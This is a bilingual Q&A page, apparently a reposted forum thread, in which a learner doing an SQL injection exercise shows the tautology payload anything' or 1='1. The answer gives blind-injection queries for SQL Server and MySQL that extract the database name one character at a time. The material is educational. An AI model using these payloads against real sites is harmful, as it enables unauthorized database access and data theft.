SQL注入-MYSQL [英] SQL Injection - MYSQL

问题描述

我正在对SQL Injection进行练习，给出了查询.数据介于"之间.所以这是查询:

I'm doing an exercise on the SQL Injection, the query is given. The data comes in between ''. So this is the query:

select * from contacts where name = ''

我设法使用以下方法查看表格中的用户:

I managed to see the users in the table using this:

select * from contacts where name = 'anything' or 1='1'

但是我的问题是如何编写它以便编写新查询?或例如查看数据库名称，以便我可以检查其他表.

But my question is how I can write it so that I can write a new query? Or see the database name for example so that I can check other tables.

为避免混淆，查询没有提供给我们，网页上有一个文本字段，这就是我们用来进行SQL注入的方法.

To avoid confusion the query is not given to us, there is a textfield on a webpage, that's what we use to do SQL injection.

因此，假设查询是这样的:

So imagine the query is being this:

select * from contacts where name = ''

然后我将此代码写到了文本字段中，以查看所有用户.

And I wrote this to the text field, to see all the users.

anything' or 1='1

我试图了解如何使用此文本字段，查看数据库名称或运行其他查询.

I'm trying to understand how I can use this textfield, to see the name of the database, or run other queries.

谢谢.

推荐答案

如果您的数据未返回多结果集，则可以这样:

If your data does not return multi-result sets then you can so something like:

在SQL Server中

In SQL Server

SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...

直到获得名称中字符的所有正确索引.

Until you get all the correct indexes of the characters in the name.

在MySQL中，它将类似于:

In MySQL it would be something like:

SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...

这篇关于SQL注入-MYSQL的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！